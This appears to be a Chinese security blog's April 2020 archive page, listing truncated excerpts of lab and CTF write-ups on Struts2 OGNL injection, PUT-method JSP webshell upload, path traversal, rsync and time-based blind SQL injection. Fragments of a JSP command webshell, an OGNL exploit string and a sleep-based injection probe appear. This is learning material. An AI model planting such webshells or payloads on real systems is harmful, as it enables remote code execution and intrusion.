04 2020 档案
摘要:options查看服务端允许得方法 可以看见有put 那就写一个木马进去 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(
阅读全文
摘要:漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletAc
阅读全文
摘要:想起来之前在360众测靶场做过 通过背景可以知道是struts2框架 扫描一下 cat key.txt
阅读全文
摘要:写题之前强烈看一下https://blog.csdn.net/qq_43380549/article/details/100011292 这个博客,这个师傅从代码到实践分析的太强 抓包 既然说了是修改密码的地方 ,然后也看了 文章一开始给的链接,然后就应该知道数据包应该修改 修改前 修改后: 命令执
阅读全文
摘要:转自https://mp.weixin.qq.com/s/0DFHERyevMz_giZHi0agiQ 在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。 比如:当面对一个MySQL注入点,通
阅读全文
摘要:Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员 优点:速度非常快,因为只同步文件当中不同的地方 Rsync默认端口:873 常用指令: -v, --verbose 详细模式输出。 -q,
阅读全文
摘要:漏洞原理:通过chybete”路径或者访问“robots”路径 这两个入口 配合路径穿越和任意文件读取可以 读取任意文件利用手法:通过“../../../../”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合闭合的目的就是为了可以正常的解析复现 :先访问chybete,发现没有这个
阅读全文
摘要:首先得去了解这个漏洞的原理 Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿
阅读全文
摘要:这里本来想写自己的题解 但是看见一个师傅写的非常好 ,做个转发吧 https://blog.csdn.net/sun1318578251/article/details/102653765 今后也是这样,大部分我会去写自己的题解 但是真的看到非常好的文章题解 我还是会选择转发,自己的一个知识储备量写
阅读全文
摘要:前段时间学习了基础和中级的rop(二进制),还有格式化字符串漏洞,二进制这块的漏洞还是比较有意思,会让你有思考的过程。 当然也得系统的去加强自己web的知识。 所以这里选择了墨者学院进行自己的一个巩固和提升。 主要也是为了以后的比赛还有面试吧。 也记录一下lianan大哥今天说的一句话:成就别人才能
阅读全文
摘要:https://www.mozhe.cn/news/detail/32
阅读全文
摘要:https://blog.csdn.net/SKI_12/article/details/84921289
阅读全文
摘要:https://blog.csdn.net/Fly_hps/article/details/85256998
阅读全文
摘要:时间盲注比布尔盲注难度稍高 ,关键在于不论你怎么输入就是不报错 那么根据什么去判断注入呢 根据请求的时间 请求的时间延时了。 1.猜测参数的包裹情况 id=1这个1要么被'包裹 要么被"包裹 要么被)包裹 先去尝试id= 1’ or sleep(3) %23 如果这个时候直接服务器过了三秒才反应 那
阅读全文
